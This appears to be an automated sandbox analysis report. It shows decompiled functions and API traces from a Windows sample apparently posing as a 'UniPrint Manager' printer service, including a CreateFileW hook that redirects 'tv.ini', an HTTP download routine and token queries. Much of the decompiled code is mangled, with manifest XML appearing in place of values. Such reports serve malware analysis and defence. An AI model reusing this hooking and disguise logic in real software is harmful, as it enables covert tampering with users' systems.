                                                                                                                          • Part of subcall function 6F333610: CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6F3336EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess$CreateMemoryResourcewsprintf$FindWindowZero$CloseFileFreeOpenService$BlockDeleteEnvironmentExitLongManagerlstrcmp$AllocCallChangeConfig2DestroyDialogFirstHandleIndirectLoadLockMoveNextParamProcSizeofSleepTextUserValuelstrcat
                                                                                                                        • String ID: .pdll$Printer manager$UniPrint Manager
                                                                                                                        • API String ID: 2623091544-3698302044
                                                                                                                        • Opcode ID: 2dda20ddb9e3a5e4c6f93f7d993a011760b35b1ea0e7c07fd96946657ab8e5f8
                                                                                                                        • Instruction ID: 5ac0fd2c4ae1d0d529d9b13a194f54f51ff00cb1a03183b8a530f83bacc646c9
                                                                                                                        • Opcode Fuzzy Hash: 2dda20ddb9e3a5e4c6f93f7d993a011760b35b1ea0e7c07fd96946657ab8e5f8
                                                                                                                        • Instruction Fuzzy Hash: 30312773E08BB4BBDA20D7648C48F9B766CEB46732F10411AF614E61C0CB759821CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_catch_memset
                                                                                                                        • String ID: MC.isComm.0$MC.isComm.1$MC.isComm.DQuery.Failed: $MC.isComm.GetProc.Failed$MC.isComm.LoadLib.Failed$NetApiBufferFree$NetWkstaUserGetInfo$Netapi32.dll
                                                                                                                        • API String ID: 1022661273-605090514
                                                                                                                        • Opcode ID: 5ee0d5c17be2d8591c5ea548fc123e854c8b9a7f167a230a8665f9cb4ce978c0
                                                                                                                        • Instruction ID: b988314c8f855af6d4c6c856e78e5bae139b399f43f535e92076c94569f55319
                                                                                                                        • Opcode Fuzzy Hash: 5ee0d5c17be2d8591c5ea548fc123e854c8b9a7f167a230a8665f9cb4ce978c0
                                                                                                                        • Instruction Fuzzy Hash: 3E71D774D05288EEDF10EBA5C946BEEBFB4AF55304F14406EE00167281D77C2B48DBA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 56%
                                                                                                                        			E6F33BBBE(intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				void* _t12;
                                                                                                                        				void* _t13;
                                                                                                                        				void* _t14;
                                                                                                                        				void* _t16;
                                                                                                                        				long _t20;
                                                                                                                        				void* _t22;
                                                                                                                        				long _t24;
                                                                                                                        				void* _t26;
                                                                                                                        				long _t36;
                                                                                                                        				signed int _t38;
                                                                                                                        				void* _t39;
                                                                                                                        				char _t43;
                                                                                                                        
                                                                                                                        				if(_a8 != 0) {
                                                                                                                        					__eflags = _a8 - 1;
                                                                                                                        					if(_a8 != 1) {
                                                                                                                        						L33:
                                                                                                                        						return 1;
                                                                                                                        					}
                                                                                                                        					_t24 =  *( *[fs:0x18] + 4);
                                                                                                                        					_a8 = 0;
                                                                                                                        					_push(0);
                                                                                                                        					while(1) {
                                                                                                                        						_t12 = InterlockedCompareExchange(0x6f340964, _t24, ??);
                                                                                                                        						__eflags = _t12;
                                                                                                                        						if(_t12 == 0) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						__eflags = _t12 - _t24;
                                                                                                                        						if(_t12 == _t24) {
                                                                                                                        							_a8 = 1;
                                                                                                                        							L11:
                                                                                                                        							_t13 =  *0x6f340960; // 0x2
                                                                                                                        							_t36 = 2;
                                                                                                                        							__eflags = _t13;
                                                                                                                        							if(_t13 == 0) {
                                                                                                                        								 *0x6f340960 = 1; // executed
                                                                                                                        								_t14 = E6F33BB78(0x6f33d47c, 0x6f33d484); // executed
                                                                                                                        								__eflags = _t14;
                                                                                                                        								if(_t14 != 0) {
                                                                                                                        									L3:
                                                                                                                        									return 0;
                                                                                                                        								}
                                                                                                                        								_push(0x6f33d478);
                                                                                                                        								_push(0x6f33d474);
                                                                                                                        								L6F33C0B0();
                                                                                                                        								 *0x6f340960 = _t36;
                                                                                                                        								L15:
                                                                                                                        								__eflags = _a8;
                                                                                                                        								if(_a8 == 0) {
                                                                                                                        									InterlockedExchange(0x6f340964, 0);
                                                                                                                        								}
                                                                                                                        								__eflags =  *0x6f340974; // 0x0
                                                                                                                        								if(__eflags != 0) {
                                                                                                                        									_push(0x6f340974);
                                                                                                                        									_t16 = E6F33C044(0, _t36, 0x6f340964, __eflags);
                                                                                                                        									__eflags = _t16;
                                                                                                                        									if(_t16 != 0) {
                                                                                                                        										 *0x6f340974(_a4, _t36, _a12);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + 1;
                                                                                                                        								goto L33;
                                                                                                                        							}
                                                                                                                        							_push(0x1f);
                                                                                                                        							L6F33C0B6();
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						Sleep(0x3e8);
                                                                                                                        						_push(0);
                                                                                                                        					}
                                                                                                                        					goto L11;
                                                                                                                        				}
                                                                                                                        				_t43 = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x1
                                                                                                                        				if(_t43 <= 0) {
                                                                                                                        					goto L3;
                                                                                                                        				}
                                                                                                                        				"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" - 1;
                                                                                                                        				_push(0);
                                                                                                                        				while(InterlockedCompareExchange(0x6f340964, 1, ??) != 0) {
                                                                                                                        					Sleep(0x3e8);
                                                                                                                        					_push(0);
                                                                                                                        				}
                                                                                                                        				_t20 =  *0x6f340960; // 0x2
                                                                                                                        				if(_t20 == 2) {
                                                                                                                        					_t26 =  *0x6f34096c; // 0xc06600
                                                                                                                        					__eflags = _t26;
                                                                                                                        					if(_t26 == 0) {
                                                                                                                        						L32:
                                                                                                                        						 *0x6f340960 = 0;
                                                                                                                        						InterlockedExchange(0x6f340964, 0);
                                                                                                                        						goto L33;
                                                                                                                        					}
                                                                                                                        					_t38 =  *0x6f340968; // 0xc06600
                                                                                                                        					_t39 = _t38 + 0xfffffffc;
                                                                                                                        					while(1) {
                                                                                                                        						__eflags = _t39 - _t26;
                                                                                                                        						if(_t39 < _t26) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						_t22 =  *_t39;
                                                                                                                        						__eflags = _t22;
                                                                                                                        						if(_t22 != 0) {
                                                                                                                        							 *_t22();
                                                                                                                        						}
                                                                                                                        						_t39 = _t39 - 4;
                                                                                                                        						__eflags = _t39;
                                                                                                                        					}
                                                                                                                        					free(_t26);
                                                                                                                        					 *0x6f340968 =  *0x6f340968 & 0x00000000;
                                                                                                                        					 *0x6f34096c =  *0x6f34096c & 0x00000000;
                                                                                                                        					__eflags =  *0x6f34096c;
                                                                                                                        					goto L32;
                                                                                                                        				}
                                                                                                                        				_push(0x1f);
                                                                                                                        				L6F33C0B6();
                                                                                                                        				goto L33;
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        • InterlockedCompareExchange.KERNEL32(6F340964,?,00000000), ref: 6F33BC2B
                                                                                                                        • _amsg_exit.MSVCRT ref: 6F33BC48
                                                                                                                        • InterlockedExchange.KERNEL32(6F340964,00000000), ref: 6F33BC92
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F33BCC9
                                                                                                                        • InterlockedCompareExchange.KERNEL32(6F340964,00000001,00000000), ref: 6F33BCD4
                                                                                                                        • _amsg_exit.MSVCRT ref: 6F33BCE6
                                                                                                                        • free.MSVCRT(00C06600), ref: 6F33BD13
                                                                                                                        • InterlockedExchange.KERNEL32(6F340964,00000000), ref: 6F33BD35
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$Compare_amsg_exit$Sleepfree
                                                                                                                        • String ID: d4o$d4o
                                                                                                                        • API String ID: 1670123637-3031744194
                                                                                                                        • Opcode ID: 0a3efa0dfdfdf4a21f909cbdd09916f0f29e6f10b98879d45571159f0939605d
                                                                                                                        • Instruction ID: 7b5427e9f727e28c60f6dd4a89875de89a6ae219444777c7c72b2acd756cb66a
                                                                                                                        • Opcode Fuzzy Hash: 0a3efa0dfdfdf4a21f909cbdd09916f0f29e6f10b98879d45571159f0939605d
                                                                                                                        • Instruction Fuzzy Hash: 9E41E6B3A45AE5EBEB20EF648D80B5A33ADAB52375F00452EF904DD1A1CF35A4518B31
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			E6F337C40(signed int __eax, WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                                                                        				char _v516;
                                                                                                                        				short _v524;
                                                                                                                        				short _v532;
                                                                                                                        				signed int _t19;
                                                                                                                        				void* _t22;
                                                                                                                        				WCHAR* _t24;
                                                                                                                        				WCHAR* _t27;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t35;
                                                                                                                        				short _t40;
                                                                                                                        				intOrPtr _t41;
                                                                                                                        				WCHAR* _t45;
                                                                                                                        				WCHAR* _t48;
                                                                                                                        				short _t50;
                                                                                                                        				WCHAR* _t53;
                                                                                                                        				WCHAR* _t55;
                                                                                                                        
                                                                                                                        				_t19 = __eax;
                                                                                                                        				_t55 = _a4;
                                                                                                                        				if(_t55 == 0) {
                                                                                                                        					L10:
                                                                                                                        					_t22 = CreateFileW(_t55, _a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                        					return _t22;
                                                                                                                        				} else {
                                                                                                                        					if( *_t55 != 0x3a) {
                                                                                                                        						_t53 = PathFindFileNameW(_t55);
                                                                                                                        						_t24 = M6F340528; // 0xa53e68
                                                                                                                        						if(lstrcmpiW(_t55, _t24) == 0) {
                                                                                                                        							_pop(_t53);
                                                                                                                        							_pop(_t55);
                                                                                                                        							_t45 = M6F340534; // 0xa563b0
                                                                                                                        							_a4 = _t45;
                                                                                                                        							goto M6F3405A4;
                                                                                                                        						}
                                                                                                                        						_t48 = M6F34056C; // 0x77af54
                                                                                                                        						_t19 = lstrcmpiW(_t53, _t48);
                                                                                                                        						if(_t19 == 0) {
                                                                                                                        							goto L2;
                                                                                                                        						} else {
                                                                                                                        							_t27 = M6F340554; // 0x749734
                                                                                                                        							_t19 = StrCmpNIW(_t55, _t27, 0xb);
                                                                                                                        							if(_t19 == 0) {
                                                                                                                        								goto L2;
                                                                                                                        							} else {
                                                                                                                        								if(lstrcmpiW(_t53, L"tv.ini") != 0) {
                                                                                                                        									goto L10;
                                                                                                                        								} else {
                                                                                                                        									_t40 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        									wsprintfW( &_v532, L"%s%s", _t40, _t53);
                                                                                                                        									if(lstrcmpiW( &_v524, _t55) != 0) {
                                                                                                                        										goto L10;
                                                                                                                        									} else {
                                                                                                                        										_t41 = M6F340550; // 0x749736
                                                                                                                        										_t50 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        										wsprintfW( &_v524, L"%s%s%s", _t50, _t41, L".ini");
                                                                                                                        										_push(_a36);
                                                                                                                        										_push(_a32);
                                                                                                                        										_push(_a28);
                                                                                                                        										_t35 = _a16;
                                                                                                                        										_push(_a24);
                                                                                                                        										_push(_a20);
                                                                                                                        										_push(_t35);
                                                                                                                        										_push( &_v516);
                                                                                                                        										M6F3405A4();
                                                                                                                        										return _t35;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						L2:
                                                                                                                        						return _t19 | 0xffffffff;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 6F337C6E
                                                                                                                        • lstrcmpiW.KERNEL32(?,00A53E68), ref: 6F337C83
                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 6F337D96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateFindNamePathlstrcmpi
                                                                                                                        • String ID: %s%s$%s%s%s$.ini$tv.ini
                                                                                                                        • API String ID: 3438131021-2591480844
                                                                                                                        • Opcode ID: 2ca70390e2e595a24703f28b25710cd9f95ababb93957c3bfe1f40c835b80e34
                                                                                                                        • Instruction ID: 2ed0c9728fc17fd149b52cc483663096b9a1a927e199fac55dd38c4ecf834b56
                                                                                                                        • Opcode Fuzzy Hash: 2ca70390e2e595a24703f28b25710cd9f95ababb93957c3bfe1f40c835b80e34
                                                                                                                        • Instruction Fuzzy Hash: D331A2B3608651AFD320EBA8DC84EAB73ADEFC9730F10451DF95583240DB35E8158B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335540(void* _a4, intOrPtr* _a8) {
                                                                                                                        				long _v4;
                                                                                                                        				void _v8;
                                                                                                                        				long* _v12;
                                                                                                                        				void* _v16;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				long _v32;
                                                                                                                        				void* _v44;
                                                                                                                        				int _v48;
                                                                                                                        				long _v60;
                                                                                                                        				void* _t25;
                                                                                                                        				int _t34;
                                                                                                                        				int _t35;
                                                                                                                        				long _t40;
                                                                                                                        				void* _t44;
                                                                                                                        				long _t53;
                                                                                                                        				DWORD* _t54;
                                                                                                                        
                                                                                                                        				_t54 = 0;
                                                                                                                        				_t53 = 0;
                                                                                                                        				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x2000); // executed
                                                                                                                        				_t44 = _t25;
                                                                                                                        				if(_t44 == 0) {
                                                                                                                        					 *_a8 = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_v8 = 0;
                                                                                                                        					_v4 = 4;
                                                                                                                        					if(HttpQueryInfoA(_a4, 0x20000013,  &_v8,  &_v4, 0) != 0 && _v28 == 0xc8) {
                                                                                                                        						_v32 = 0;
                                                                                                                        						_t34 = InternetReadFile(_v16, _t44, 0x1fff,  &_v32); // executed
                                                                                                                        						if(_t34 != 0) {
                                                                                                                        							while(1) {
                                                                                                                        								_t35 = _v48;
                                                                                                                        								if(_t35 == 0) {
                                                                                                                        									goto L15;
                                                                                                                        								}
                                                                                                                        								if(_t54 > 0x100000) {
                                                                                                                        									if(_t53 != 0) {
                                                                                                                        										goto L13;
                                                                                                                        									}
                                                                                                                        									goto L14;
                                                                                                                        								} else {
                                                                                                                        									if(_t53 != 0) {
                                                                                                                        										_t40 = HeapReAlloc(GetProcessHeap(), 0, _t53, _t35 + _t54 + 1);
                                                                                                                        										if(_t40 == 0) {
                                                                                                                        											L13:
                                                                                                                        											HeapFree(GetProcessHeap(), 0, _t53);
                                                                                                                        											L14:
                                                                                                                        											_t53 = 0;
                                                                                                                        											_t54 = 0;
                                                                                                                        										} else {
                                                                                                                        											goto L10;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										_t12 = _t54 + 1; // 0x20000014
                                                                                                                        										_t40 = HeapAlloc(GetProcessHeap(), _t53, _t35 + _t12);
                                                                                                                        										L10:
                                                                                                                        										_t53 = _t40;
                                                                                                                        										RtlMoveMemory(_t53 + _t54, _t44, _v48);
                                                                                                                        										_t54 = _t54 + _v60;
                                                                                                                        										 *(_t53 + _t54) = 0;
                                                                                                                        										_v60 = 0;
                                                                                                                        										if(InternetReadFile(_v44, _t44, 0x1fff,  &_v60) != 0) {
                                                                                                                        											continue;
                                                                                                                        										} else {
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L15:
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t44);
                                                                                                                        					 *_v12 = _t53;
                                                                                                                        					return _t54;
                                                                                                                        				}
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000000), ref: 6F335558
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33555B
                                                                                                                        • HttpQueryInfoA.WININET ref: 6F33558C
                                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6F3355BC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,20000014), ref: 6F3355EE
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3355F1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 6F335601
                                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 6F335604
                                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,20000013), ref: 6F33561A
                                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6F33563F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F335652
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335655
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F335662
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335665
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Alloc$FileFreeInternetRead$HttpInfoMemoryMoveQuery
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1362589046-0
                                                                                                                        • Opcode ID: cc3f2d6d5998976383643e1cb91f6efb3d010b5224ff75cb4ca6b6eedd9969db
                                                                                                                        • Instruction ID: 3b712053e6030056f4d301237fd8775ea5e0c5217c75fde754730b638ba1ce80
                                                                                                                        • Opcode Fuzzy Hash: cc3f2d6d5998976383643e1cb91f6efb3d010b5224ff75cb4ca6b6eedd9969db
                                                                                                                        • Instruction Fuzzy Hash: 373189B26043A6ABE710CE699844F6BB7AEFB89754F00091DF949C2140DB31E9088B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,LdrUnloadDll,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4C00
                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 004B4C7C
                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4C9E
                                                                                                                        • LoadLibraryA.KERNEL32(security.dll,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4CB1
                                                                                                                        • InterlockedExchange.KERNEL32(00000001,00000000), ref: 004B4CB7
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4CC2
                                                                                                                        • InterlockedExchange.KERNEL32(00805004,00000000), ref: 004B4CEF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4CFA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$ExchangeInterlocked$FreeLoad$HandleModule
                                                                                                                        • String ID: LdrUnloadDll$ntdll.dll$security.dll$ft
                                                                                                                        • API String ID: 3965272021-579589440
                                                                                                                        • Opcode ID: dc4634acba12b4e2aa2b22c9cfba4cba992891e70106b89f443a36c3aa50dda0
                                                                                                                        • Instruction ID: 33dceadfb9b2b82d47577c4016ca292e05a1d2d94e79d44919137fa0ec80249f
                                                                                                                        • Opcode Fuzzy Hash: dc4634acba12b4e2aa2b22c9cfba4cba992891e70106b89f443a36c3aa50dda0
                                                                                                                        • Instruction Fuzzy Hash: F331EF31201606ABDB219F25AC44AEB3FB9BFC1B51B128022F94197362D73DCC15DBB9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E6F333390() {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				short _v12;
                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                        				void* _v20;
                                                                                                                        				void* _v24;
                                                                                                                        				long _v28;
                                                                                                                        				int _t25;
                                                                                                                        				int _t33;
                                                                                                                        				void* _t56;
                                                                                                                        
                                                                                                                        				_v12 = 0;
                                                                                                                        				_v20 = 0;
                                                                                                                        				if(OpenProcessToken(0xffffffff, 8,  &_v20) == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_v24 = 0;
                                                                                                                        					_t25 = GetTokenInformation(_v20, 1, 0, 0,  &_v24); // executed
                                                                                                                        					if(_t25 == 0 && GetLastError() == 0x7a) {
                                                                                                                        						_t56 = HeapAlloc(GetProcessHeap(), 8, _v28);
                                                                                                                        						if(_t56 != 0) {
                                                                                                                        							_t33 = GetTokenInformation(_v24, 1, _t56, _v28,  &_v28); // executed
